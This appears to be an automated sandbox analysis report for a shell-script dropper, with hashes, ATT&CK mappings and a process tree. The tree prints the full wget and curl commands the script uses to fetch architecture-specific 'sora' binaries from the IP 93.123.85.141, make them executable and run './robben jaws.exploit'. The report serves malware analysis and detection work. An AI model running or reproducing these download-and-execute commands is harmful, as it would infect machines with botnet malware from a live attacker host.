Analysis
max time kernel: 37s
max time network: 41s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 01:47
Static task: static1
Behavioral task: behavioral1
  Sample: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  Resource: debian9-mipsel-20240611-en
General
Target: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Size: 2KB
MD5: 891d1dcbed8ea0751d0c0d0fec39ae18
SHA1: 57db06f345b0d9b4e2a7f4a502678a82ed792174
SHA256: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
SHA512: 20efcebab56d13d819a5fc0f1cdaf5952ec218e8ad4a8ecad863b5ccbbbc60bf82ad7bedb67196ae51c9c0156fce1a2279013018268560331c3b436762ed2992
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  758   chmod
  799   chmod
  850   chmod
  684   chmod
  698   chmod
  706   chmod
  783   chmod
  827   chmod
  789   chmod
  838   chmod
  712   chmod
  723   chmod
  777   chmod
  814   chmod
Executes dropped EXE (14 IoCs)
  ioc          pid   Process
  /tmp/robben  686   robben
  /tmp/robben  699   robben
  /tmp/robben  707   robben
  /tmp/robben  713   robben
  /tmp/robben  725   robben
  /tmp/robben  759   robben
  /tmp/robben  778   robben
  /tmp/robben  784   robben
  /tmp/robben  790   robben
  /tmp/robben  801   robben
  /tmp/robben  816   robben
  /tmp/robben  829   robben
  /tmp/robben  839   robben
  /tmp/robben  851   robben
Checks CPU configuration (1 TTPs, 14 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
  description              ioc            Process
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
Reads runtime system information
  description              ioc                            Process
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
  pid   Process
  696   cat
  690   wget
  692   curl
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
  description                   ioc          Process
  File opened for modification  /tmp/robben  5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh (PID 663)
  command: /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  - Writes file to tmp directory
  /usr/bin/wget (PID 665)
    command: wget http://93.123.85.141/bins/sora.x86
  /usr/bin/curl (PID 673)
    command: curl -O http://93.123.85.141/bins/sora.x86
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 681)
    command: cat sora.x86
  /bin/chmod (PID 684)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 686)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 690)
    command: wget http://93.123.85.141/bins/sora.mips
    - System Network Configuration Discovery
  /usr/bin/curl (PID 692)
    command: curl -O http://93.123.85.141/bins/sora.mips
    - Checks CPU configuration
    - Reads runtime system information
    - System Network Configuration Discovery
  /bin/cat (PID 696)
    command: cat sora.mips
    - System Network Configuration Discovery
  /bin/chmod (PID 698)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 699)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 701)
    command: wget http://93.123.85.141/bins/sora.x86_64
  /usr/bin/curl (PID 703)
    command: curl -O http://93.123.85.141/bins/sora.x86_64
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 705)
    command: cat sora.x86_64
  /bin/chmod (PID 706)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 707)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 709)
    command: wget http://93.123.85.141/bins/sora.i468
  /usr/bin/curl (PID 710)
    command: curl -O http://93.123.85.141/bins/sora.i468
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 711)
    command: cat sora.i468
  /bin/chmod (PID 712)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 713)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 715)
    command: wget http://93.123.85.141/bins/sora.i686
  /usr/bin/curl (PID 718)
    command: curl -O http://93.123.85.141/bins/sora.i686
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 721)
    command: cat sora.i686
  /bin/chmod (PID 723)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 725)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 727)
    command: wget http://93.123.85.141/bins/sora.mpsl
  /usr/bin/curl (PID 734)
    command: curl -O http://93.123.85.141/bins/sora.mpsl
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 756)
    command: cat sora.mpsl
  /bin/chmod (PID 758)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 759)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 761)
    command: wget http://93.123.85.141/bins/sora.arm4
  /usr/bin/curl (PID 766)
    command: curl -O http://93.123.85.141/bins/sora.arm4
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 775)
    command: cat sora.arm4
  /bin/chmod (PID 777)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 778)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 780)
    command: wget http://93.123.85.141/bins/sora.arm5
  /usr/bin/curl (PID 781)
    command: curl -O http://93.123.85.141/bins/sora.arm5
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 782)
    command: cat sora.arm5
  /bin/chmod (PID 783)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 784)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 786)
    command: wget http://93.123.85.141/bins/sora.arm6
  /usr/bin/curl (PID 787)
    command: curl -O http://93.123.85.141/bins/sora.arm6
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 788)
    command: cat sora.arm6
  /bin/chmod (PID 789)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 790)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 792)
    command: wget http://93.123.85.141/bins/sora.arm7
  /usr/bin/curl (PID 793)
    command: curl -O http://93.123.85.141/bins/sora.arm7
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 797)
    command: cat sora.arm7
  /bin/chmod (PID 799)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd
    - File and Directory Permissions Modification
  /tmp/robben (PID 801)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 804)
    command: wget http://93.123.85.141/bins/sora.ppc
  /usr/bin/curl (PID 809)
    command: curl -O http://93.123.85.141/bins/sora.ppc
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 813)
    command: cat sora.ppc
  /bin/chmod (PID 814)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben
    - File and Directory Permissions Modification
  /tmp/robben (PID 816)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 818)
    command: wget http://93.123.85.141/bins/sora.ppc440fp
  /usr/bin/curl (PID 822)
    command: curl -O http://93.123.85.141/bins/sora.ppc440fp
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 826)
    command: cat sora.ppc440fp
  /bin/chmod (PID 827)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben
    - File and Directory Permissions Modification
  /tmp/robben (PID 829)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 831)
    command: wget http://93.123.85.141/bins/sora.m68k
  /usr/bin/curl (PID 834)
    command: curl -O http://93.123.85.141/bins/sora.m68k
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 837)
    command: cat sora.m68k
  /bin/chmod (PID 838)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben
    - File and Directory Permissions Modification
  /tmp/robben (PID 839)
    command: ./robben jaws.exploit
    - Executes dropped EXE
  /usr/bin/wget (PID 842)
    command: wget http://93.123.85.141/bins/sora.sh4
  /usr/bin/curl (PID 844)
    command: curl -O http://93.123.85.141/bins/sora.sh4
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 848)
    command: cat sora.sh4
  /bin/chmod (PID 850)
    command: chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben
    - File and Directory Permissions Modification
  /tmp/robben (PID 851)
    command: ./robben jaws.exploit
    - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  - File and Directory Permissions Modification (1)
    - Linux and Mac File and Directory Permissions Modification (1)
  - Virtualization/Sandbox Evasion (1)
    - System Checks (1)